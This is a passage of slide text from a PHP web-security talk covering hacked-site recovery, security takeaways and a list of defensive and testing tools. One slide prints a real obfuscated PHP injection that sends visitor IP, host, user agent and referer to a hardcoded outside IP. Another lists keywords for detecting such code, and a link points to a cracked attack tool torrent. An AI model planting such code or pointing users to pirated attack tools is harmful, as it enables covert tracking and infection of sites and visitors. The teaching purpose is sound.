  • 71. What a hack might look like $GLOBALS['_226432454_']=Array(); function _1618533527($i) { return '91.196.216.64'; } $ip=_1618533527(0); $GLOBALS['_1203443956_'] = Array('urlencode'); function _1847265367($i) { $a=Array('http://','/btt.php? ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER'); return $a[$i]; } $url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) . $_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)]; $GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents'); function _393632915($i) { return 'curl_version'; }
  • 72. You've been hacked ! Now what ? (2/4) Search system preg_replace base64_decode eval system exec passthru Search system and database script iframe
  • 73. You've been hacked ! Now what ? (3/4) Find out how the hack happened ;-) Write an apology to your customers Finally : Reinstall the OS (from scratch !) Update all packages to the latest version Don't reinstall code from backup ! Install source code from versioning system Restore DB from previous backup (use binary log file)
  • 74. Restoring your database to a specific point Turn on binary log Usually for master-slave replication Useful for fast recovery Make sure it can handle >24h of data Make a daily database backup Make a db dump to a file (mysqldump, …) Warning : locking danger → do this on the slave ! Backup the db dump file To recover : Restore the db dump file Replay binary log (mysqlbinlog …)
  • 75. You've been hacked ! Now what ? (4/4) Install IDS Get an external security audit on the code Get an external security audit on the system/network setup Change user passwords Relaunch Cross your fingers
  • 76. Takeaways Think like a hacker Can I steal data ? Can I DOS the site ? Which techniques could I use to do it ? Try it without looking at the code Try it while looking at the code Use SSL/HTTPS everywhere ! Block all traffic, then allow only what's needed Sanitize/filter your input Escape your output Use an IDS Never trust a hacked system Prepare for GDPR
  • 79. The software discussed (and more) General resources OWASP : www.owasp.org SANS : http://www.sans.org/security-resources/ SecurityFocus : http://www.securityfocus.com/ CERT : http://cert.org/ SecTools : http://sectools.org/ SQL injection Havij (automated tool) – beware : might be infected !!!!!!!! https://thepirateboat.eu/torrent/8410326/Havij_v1.17ProCracked.7z Clickjacking demo : https://www.youtube.com/watch?v=3mk0RySeNsU Password use in PHP 5.5+ : password_hash function : http://php.net/password_hash < 5.5 : password_compat : https://github.com/ircmaxell/password_compat
  • 80. The software discussed (and more) SSL certificates RapidSSL FreeSSL : https://www.freessl.com/ Let's Encrypt (coming soon) : https://letsencrypt.org/ StartSSL : https://www.startssl.com Block access to .svn and .git : http://blogs.reliablepenguin.com/2014/06/26/block-access-git-svn-folders Webserver flood/scan detection Nginx : http://nginx.com/resources/admin-guide/restricting-access/ Multi-webserver : http://www.fail2ban.org Proxy-based : http://www.ecl-labs.org/2011/03/17/roboo-http-mitigator.html
  • 81. The software discussed (and more) Protecting your mail server SPF and DomainKeys : http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/ DNS Hijacking : http://www.gohacking.com/dns-hijacking/ Spoofing : http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding- Man-in-the-Middle-Attacks-ARP-Part2.html IPv6 – don't forget to firewall it the same way : https://www.sixxs.net/wiki/IPv6_Firewalling Automatic scanning tools : Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner Wapiti : http://wapiti.sourceforge.net/ Nexpose : http://www.rapid7.com/products/nexpose/
  • 82. The software discussed (and more) Slow HTTP DOS attacks : https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate-apache-http-ser ver/ IDS PHP PHPIDS : https://github.com/PHPIDS/PHPIDS Exposé : https://github.com/enygma/expose Host-based OSSEC : www.ossec.net Samhain : http://www.la-samhna.de/samhain/ AIDE : http://aide.sourceforge.net/ Network-based Snort : https://www.snort.org/ Sirucata : http://suricata-ids.org/ All in one : Security Onion : http://blog.securityonion.net/
  • 83. The software discussed (and more) Penetration testing live CD : Backtrack Linux : http://www.backtrack-linux.org/ Kali Linux : https://www.kali.org/
  • 84. In case you're interested This talk : 45min Training : 2 days 1,5 days of interactive training (partly slides, partly hands-on) Try out different security issues Experiment on local virtualboxes and physical machines 0,5 day of auditing Your code Your servers Your network As a global team effort or in smaller teams More details : https://techpath.eu
  • 85. Next week On stage : Derick Rethans, author of Xdebug 3 and PHP 7.4 release manager Location : Zaventem Date / time : 2019-12-11T19:00:00.00000+02:00 Find us on Meetup.com and RSVP please ;-)
  • 86. Thanks ! Twitter @wimgtr Slides http://www.slideshare.net/wimg E-mail wim@cu.be